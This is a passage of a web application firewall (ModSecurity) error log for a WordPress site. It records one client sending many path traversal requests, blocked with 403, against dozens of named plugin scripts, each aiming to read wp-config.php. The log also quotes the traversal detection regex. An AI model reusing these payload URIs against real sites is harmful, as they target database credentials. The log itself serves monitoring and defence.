[uri "/wp-content/plugins/old-post-spinner/logview.php"] [unique_id "YtscY3xqqtgWgIAXsGFhbwAAAAU"] [Fri Jul 22 16:53:40.020231 2022] [:error] [pid 22470:tid 140016973952768] [client 72.11.157.116:51436] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/page-flip-image-gallery/books/getConfig.php"] [unique_id "YtscZHxqqtgWgIAXsGFhcAAAABQ"] [Fri Jul 22 16:53:40.129904 2022] [:error] [pid 22470:tid 140017015916288] [client 72.11.157.116:51438] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/photocart-link/decode.php?id=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/photocart-link/decode.php"] [unique_id "YtscZHxqqtgWgIAXsGFhcQAAAA8"] [Fri Jul 22 16:53:40.219266 2022] [:error] [pid 22470:tid 140016999130880] [client 72.11.157.116:51440] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pica-photo-gallery/picadownload.php"] [unique_id "YtscZHxqqtgWgIAXsGFhcgAAABE"] [Fri Jul 22 16:53:40.310200 2022] [:error] [pid 23081:tid 140017099843328] [client 72.11.157.116:51444] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pictpress/resize.php?size=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pictpress/resize.php"] [unique_id "YtscZHhurfgLch3PImzH-AAAAMU"] [Fri Jul 22 16:53:40.400483 2022] [:error] [pid 23081:tid 140016990738176] [client 72.11.157.116:51446] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "YtscZHhurfgLch3PImzH-QAAANI"] [Fri Jul 22 16:53:40.522536 2022] [:error] [pid 22472:tid 140016957167360] [client 72.11.157.116:51448] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php"] [unique_id "YtscZCpbG8_UBGXeM63wtwAAAJY"] [Fri Jul 22 16:53:40.613195 2022] [:error] [pid 22470:tid 140017133414144] [client 72.11.157.116:51450] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "YtscZHxqqtgWgIAXsGFhdAAAAAE"] [Fri Jul 22 16:53:40.705221 2022] [:error] [pid 22472:tid 140016982345472] [client 72.11.157.116:51452] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "YtscZCpbG8_UBGXeM63wuAAAAJM"] [Fri Jul 22 16:53:40.805606 2022] [:error] [pid 22471:tid 140017015916288] [client 72.11.157.116:51454] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/relocate-upload/relocate-upload.php"] [unique_id "YtscZOCtYZwatdwcM8WqzAAAAE8"] [Fri Jul 22 16:53:40.896957 2022] [:error] [pid 22471:tid 140016999130880] [client 72.11.157.116:51456] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/robotcpa/f.php"] [unique_id "YtscZOCtYZwatdwcM8WqzQAAAFE"] [Fri Jul 22 16:53:41.015697 2022] [:error] [pid 23081:tid 140016965560064] [client 72.11.157.116:51458] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "YtscZXhurfgLch3PImzH-gAAANU"] [Fri Jul 22 16:53:41.120420 2022] [:error] [pid 22470:tid 140017116628736] [client 72.11.157.116:51460] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/se-html5-album-audio-player/download_audio.php"] [unique_id "YtscZXxqqtgWgIAXsGFhdQAAAAM"] [Fri Jul 22 16:53:41.223200 2022] [:error] [pid 22471:tid 140017125021440] [client 72.11.157.116:51462] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "YtscZeCtYZwatdwcM8WqzgAAAEI"] [Fri Jul 22 16:53:41.324474 2022] [:error] [pid 23081:tid 140017091450624] [client 72.11.157.116:51464] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sf-booking/lib/downloads.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sf-booking/lib/downloads.php"] [unique_id "YtscZXhurfgLch3PImzH-wAAAMY"] [Fri Jul 22 16:53:41.415463 2022] [:error] [pid 22470:tid 140017066272512] [client 72.11.157.116:51466] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "YtscZXxqqtgWgIAXsGFhdgAAAAk"] [Fri Jul 22 16:53:41.505619 2022] [:error] [pid 22472:tid 140017074665216] [client 72.11.157.116:51468] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "YtscZSpbG8_UBGXeM63wuQAAAIg"] [Fri Jul 22 16:53:41.618843 2022] [:error] [pid 22470:tid 140017024308992] [client 72.11.157.116:51470] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "YtscZXxqqtgWgIAXsGFhdwAAAA4"] [Fri Jul 22 16:53:41.709994 2022] [:error] [pid 23081:tid 140017057879808] [client 72.11.157.116:51472] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "YtscZXhurfgLch3PImzH_AAAAMo"] [Fri Jul 22 16:53:41.799066 2022] [:error] [pid 22471:tid 140016948774656] [client 72.11.157.116:51474] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-import/admin/page.php"] [unique_id "YtscZeCtYZwatdwcM8WqzwAAAFc"] [Fri Jul 22 16:53:41.890735 2022] [:error] [pid 23081:tid 140016948774656] [client 72.11.157.116:51476] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "YtscZXhurfgLch3PImzH_QAAANc"] [Fri Jul 22 16:53:41.980276 2022] [:error] [pid 23081:tid 140017141806848] [client 72.11.157.116:51478] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php"] [unique_id "YtscZXhurfgLch3PImzH_gAAAMA"] [Fri Jul 22 16:53:42.069699 2022] [:error] [pid 22471:tid 140016965560064] [client 72.11.157.116:51480] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/treemap.php"] [unique_id "YtscZuCtYZwatdwcM8Wq0AAAAFU"] [Fri Jul 22 16:53:42.159394 